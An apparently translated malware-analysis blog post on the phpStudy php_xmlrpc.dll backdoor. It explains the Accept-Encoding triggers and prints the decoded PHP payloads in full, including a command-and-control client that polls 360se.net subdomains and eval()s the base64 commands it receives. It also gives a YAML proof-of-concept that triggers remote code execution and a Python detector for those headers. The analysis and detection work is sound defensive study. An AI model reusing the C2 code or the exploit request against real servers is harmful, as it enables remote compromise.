A simple analysis of the phpStudy backdoor

Thanks to pcat's article: https://mp.weixin.qq.com/s/dIDfgFxHlqenKRUSW7Oqkw


On the 20th I learned that phpStudy had a backdoor. I did not know whether the official site had also been compromised and did not check at the time; I was busy with autumn recruitment interviews, so after putting it off for a few days, here is the follow-up:

The trojanized file is php_xmlrpc.dll. Finding it can easily be scripted by searching for the leaked strings, so I won't paste the script; you can search with eval as the keyword.

Actual testing showed that the phpStudy 2018 download from the official site (php-5.2.17 and php-5.4.45) contains the backdoor.

[Figures 1 and 2: IDA string search results]

The figures above show the strings returned by IDA's string search, which is enough to establish that this DLL is suspicious. Next, its control flow needs to be verified.

Reverse connection: if ACCEPT_ENCODING equals compress,gzip, the key fragment @eval(gzuncompress('%s')); shows that a piece of malicious code is spliced in and then decoded by calling gzuncompress.

Here the code @eval(gzuncompress('%s')); is assembled, which clearly calls gzuncompress to decode and execute some code. The still-encoded payload comes from the region asc_1000D028 to unk_1000D66C, and the assembled string is stored at v44. (gzuncompress is frequently used to make webshells evade AV, yikes.)

Forward connection: if ACCEPT_ENCODING equals gzip,deflate, the content of ACCEPT_CHARSET is read, base64-decoded, and handed to zend_eval_string(), which can execute arbitrary malicious code.

[Figure 3]

zend_eval_string executes the code held at v42. Extracting that data, processing it, and decoding it with PHP's gzuncompress gives the following:

// First decoded payload: sends one request to the local script itself with
// Accept-Encoding: compress,gzip, i.e. the header that takes the "reverse connection" path
@ini_set("display_errors","0");
error_reporting(0);
$h = $_SERVER['HTTP_HOST'];
$p = $_SERVER['SERVER_PORT'];
$fp = fsockopen($h, $p, $errno, $errstr, 5);
if (!$fp) {
    // connection failure is silently ignored
} else {
    $out = "GET {$_SERVER['SCRIPT_NAME']} HTTP/1.1\r\n";
    $out .= "Host: {$h}\r\n";
    $out .= "Accept-Encoding: compress,gzip\r\n";
    $out .= "Connection: Close\r\n\r\n";

    fwrite($fp, $out);
    fclose($fp);
}

// Second decoded payload: the C2 client
@ini_set("display_errors","0");
error_reporting(0);
// Send $sendMsg to $ip:$port and return whatever the server replies
function tcpGet($sendMsg = '', $ip = '360se.net', $port = '20123'){
    $result = "";
    $handle = stream_socket_client("tcp://{$ip}:{$port}", $errno, $errstr, 10);
    if (!$handle) {
        // fall back to fsockopen if stream_socket_client fails
        $handle = fsockopen($ip, intval($port), $errno, $errstr, 5);
        if (!$handle) {
            return "err";
        }
    }
    fwrite($handle, $sendMsg."\n");
    while (!feof($handle)) {
        stream_set_timeout($handle, 2);
        $result .= fread($handle, 1024);
        $info = stream_get_meta_data($handle);
        if ($info['timed_out']) {
            break;
        }
    }
    fclose($handle);
    return $result;
}

// Candidate C2 subdomains and ports; the first host:port that answers is used
$ds = array("www","bbs","cms","down","up","file","ftp");
$ps = array("20123","40125","8080","80","53");
$n = false;
do {
    $n = false;
    foreach ($ds as $d){
        $b = false;
        foreach ($ps as $p){
            // $i is not defined anywhere in the decoded excerpt as shown
            $result = tcpGet($i, $d.".360se.net", $p);
            if ($result != "err"){
                $b = true;
                break;
            }
        }
        if ($b) break;
    }
    // Reply format: four fields separated by "<^>"; the fourth is base64-encoded PHP
    $info = explode("<^>", $result);
    if (count($info) == 4){
        // A "/*Onemore*/" marker tells the client to loop and fetch another command
        if (strpos($info[3], "/*Onemore*/") !== false){
            $info[3] = str_replace("/*Onemore*/", "", $info[3]);
            $n = true;
        }
        @eval(base64_decode($info[3]));
    }
} while($n);

Essentially this is fsockopen-based communication that connects back to the attacker at $ip = '360se.net', $port = '20123', with a pile of other conditions in between.

[Figure 4]

As it happens, it expires today.


Vulnerability verification plugin

name: poc-yaml-phpstudy-backdoor-rce
rules:
  - method: GET
    path: /index.php
    headers:
      Accept-Encoding: 'gzip,deflate'
      Accept-Charset: cHJpbnRmKG1kNSg0NTczMTM0NCkpOw==
    follow_redirects: false
    expression: |
      body.bcontains(b'a5952fb670b54572bcec7440a554633e')
detail:
  author: 17bdw
  Affected Version: "phpstudy 2016-phpstudy 2018 php 5.2 php 5.4"
  vuln_url: "php_xmlrpc.dll"
  links:
    - https://www.freebuf.com/column/214946.html
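As an added example (not from the original post, phpStudy or the plugin author), the two trigger conditions described above turned into a detector that a WAF or pcap-review script could run over request heads. The requests are constructed, 192.0.2.10 is a placeholder host, and the Accept-Charset of the first request is the value from the POC plugin.

```python
import base64
import re
from typing import Dict, Optional

# Accept-Encoding values the backdoor in php_xmlrpc.dll compares against (from the analysis above).
FORWARD_TRIGGER = "gzip,deflate"   # then base64(Accept-Charset) goes to zend_eval_string
REVERSE_TRIGGER = "compress,gzip"  # sent by the decoded beacon stage to its own host
# Tokens that make a decoded Accept-Charset look like PHP rather than a charset name.
PHP_TOKENS = re.compile(r"\$_(GET|POST|SERVER)|eval|system|passthru|printf|md5|base64_decode|gzuncompress|[(;]")

def parse_raw_request(raw: str) -> Dict[str, str]:
    """Parse an HTTP/1.x request head (WAF capture, pcap) into a lowercase-name header dict."""
    headers: Dict[str, str] = {}
    for line in raw.strip().splitlines()[1:]:  # skip the request line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers

def decode_charset_payload(value: str) -> Optional[str]:
    """Return Accept-Charset base64-decoded if it is printable ASCII, else None."""
    try:
        decoded = base64.b64decode(value, validate=True).decode("ascii")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None
    return decoded if decoded.isprintable() else None

def classify_request(headers: Dict[str, str]) -> Optional[str]:
    """Return 'forward_rce', 'reverse_beacon' or None for one request's headers."""
    enc = headers.get("accept-encoding", "").replace(" ", "").lower()
    if enc == FORWARD_TRIGGER:
        payload = decode_charset_payload(headers.get("accept-charset", ""))
        if payload and PHP_TOKENS.search(payload):
            return "forward_rce"
    if enc == REVERSE_TRIGGER and headers.get("connection", "").lower() == "close":
        return "reverse_beacon"
    return None

# Constructed requests, not captured traffic; 192.0.2.10 is a placeholder host and the
# Accept-Charset of the first one is the value from the POC plugin above.
POC_REQUEST = ("GET /index.php HTTP/1.1\r\nHost: 192.0.2.10\r\nAccept-Encoding: gzip,deflate\r\n"
               "Accept-Charset: cHJpbnRmKG1kNSg0NTczMTM0NCkpOw==\r\n\r\n")
BEACON_REQUEST = ("GET /index.php HTTP/1.1\r\nHost: 192.0.2.10\r\n"
                  "Accept-Encoding: compress,gzip\r\nConnection: Close\r\n\r\n")
BROWSER_REQUEST = ("GET /index.php HTTP/1.1\r\nHost: 192.0.2.10\r\n"
                   "Accept-Encoding: gzip, deflate, br\r\nAccept-Charset: utf-8\r\n\r\n")

if __name__ == "__main__":
    for name, raw in (("poc", POC_REQUEST), ("beacon", BEACON_REQUEST), ("browser", BROWSER_REQUEST)):
        print(name, classify_request(parse_raw_request(raw)))
```

A normal browser sends "gzip, deflate, br" and no base64 Accept-Charset, so it falls through to None; only the exact trigger value combined with a decodable PHP-looking charset is reported.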

Event-related IOCs

